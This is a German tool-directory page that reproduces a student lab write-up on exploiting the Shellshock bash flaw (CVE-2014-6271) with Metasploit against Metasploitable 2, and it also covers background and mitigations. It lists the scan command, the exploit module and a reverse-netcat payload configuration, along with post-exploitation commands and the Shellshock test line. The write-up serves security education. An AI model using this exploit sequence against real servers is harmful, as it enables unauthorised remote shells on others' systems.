Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Shellshock-CVE-2014-6271-Exploitation-and-Analysis — # Bildungslabor zur Demonstration der Shellshock-Ausnutzung (CVE-2014-6271) mit Metasploit gegen Metasploitable 2, einschließlich Scannen, Ausnutzung, Reverse Shell und Gegenmaßnahmen. | Kitploit
Tools/GitHubGitHub/rajmadhusankha/shellshock-cve-2014-6271-exploitation-and-analysis
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubrajmadhusankha/shellshock-cve-2014-6271-exploitation-and-analysis

Shellshock-CVE-2014-6271-Exploitation-and-Analysis

# Bildungslabor zur Demonstration der Shellshock-Ausnutzung (CVE-2014-6271) mit Metasploit gegen Metasploitable 2, einschließlich Scannen, Ausnutzung, Reverse Shell und Gegenmaßnahmen.

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🐚 Shellshock (CVE-2014-6271) – Ausnutzung und Analyse

📌 Übersicht

Dies ist die praktische Aufgabe für Vulnerability Assessment and Penetration Testing – II, die sich auf die Ausnutzung und Analyse der Shellshock-Sicherheitslücke (CVE-2014-6271) konzentriert.
Durchgeführt in einer kontrollierten Laborumgebung mit Metasploitable 2 (Ziel) und Kali Linux (Angreifer).


🛠 Verwendete Werkzeuge

  • 💻 Kali Linux – Angreifer-Maschine
  • 🖥 Metasploitable 2 – Verwundbares Ziel
  • 🔍 Nmap – Scannen & Diensterkennung
  • 🎯 Metasploit Framework – Ausnutzung

🔍 Zusammenfassung der Sicherheitslücke

  • Typ: Remote Code Execution (RCE)
  • Betroffene Komponente: GNU Bash (Versionen 1.14–4.3)
  • Auswirkung: Ausführen beliebiger Befehle über speziell gestaltete Umgebungsvariablen
  • CVSS-Score: 10,0 (Kritisch)
  • Ausnutzungsvektor: Häufig über HTTP-Header an CGI-Skripte

⚡ Laborschritte

1️⃣ Ziel scannen

 nmap -sS -sV <target-ip>

2️⃣ Metasploit starten msfconsole

3️⃣ Exploit-Modul laden use exploit/multi/http/apache_mod_cgi_bash_env_exec

4️⃣ Exploit konfigurieren

set RHOST <target-ip>
set TARGETURI /cgi-bin/status
set LHOST <your-kali-ip>
set PAYLOAD cmd/unix/reverse_netcat

5️⃣ Exploit ausführen exploit

📸 Demonstration umfasst

📡 Nmap-Scannergebnisse

⚙️ Metasploit-Konfiguration

🔄 Reverse-Shell-Sitzungsausgabe

🛠 Post-Exploitation-Befehle:

whoami
uname -a
ifconfig

📖 Theoretischer Hintergrund

Was ist Shellshock?

Shellshock ist eine Sicherheitslücke in der GNU-Bash-Shell, die es Angreifern ermöglicht, beliebige Befehle auszuführen, indem sie diese in Umgebungsvariablen einschleusen. Entdeckt im September 2014 und als CVE-2014-6271 eingestuft, betrifft es Bash v1.14 bis v4.3.

Wie es funktioniert

Bash verarbeitet Funktionsdefinitionen in Umgebungsvariablen fehlerhaft und führt nach dem Funktionskörper zusätzliche Befehle aus. In Webservern, die CGI-Skripte verwenden, werden HTTP-Header zu Umgebungsvariablen, was einen einfachen Angriffspfad schafft.

Beispiel:

env x='() { :;}; echo vulnerable' bash -c "echo test"

Wenn anfällig, wird vulnerable ausgegeben.

Auswirkung

Vollständige Remote-Codeausführung (RCE) ohne Authentifizierung

Ausnutzbar über einfache HTTP-Anfragen

Eingesetzt in Botnetzen, Würmern, gezielten Angriffen

Betraf Millionen von Servern, Routern und IoT-Geräten

Echte Exploits

Yahoo-Server – Schadsoftware über CGI-Skripte

Wopbot-Botnet – Automatisierte Ausnutzung

QNAP NAS – Remote-Shell-Zugriff & Schadsoftware

Selbstreplizierende Würmer – Verbreitung auf neue verwundbare Hosts

🛡 Prävention & Schadensbegrenzung

🔄 Bash sofort aktualisieren

🚫 Unbenutzte CGI-Skripte deaktivieren

🔥 Firewalls verwenden, um unnötigen Datenverkehr zu blockieren

🛡 Web Application Firewalls (WAF) einsetzen

📜 HTTP-Anforderungsprotokolle überwachen

👤 Prinzip der geringsten Privilegien anwenden

⚠️ Haftungsausschluss

Dieses Projekt dient ausschließlich zu Bildungszwecken. Alle Tests wurden in einer kontrollierten Laborumgebung durchgeführt. ❌ Verwenden Sie diese Techniken nicht auf Systemen ohne Erlaubnis.

👨‍💻 Autor: Janith Madhusankha 🎓 Kurs: BICT (Hons) in Network & Security 🏫 Institution: South Eastern University of Sri Lanka

Tool herunterladen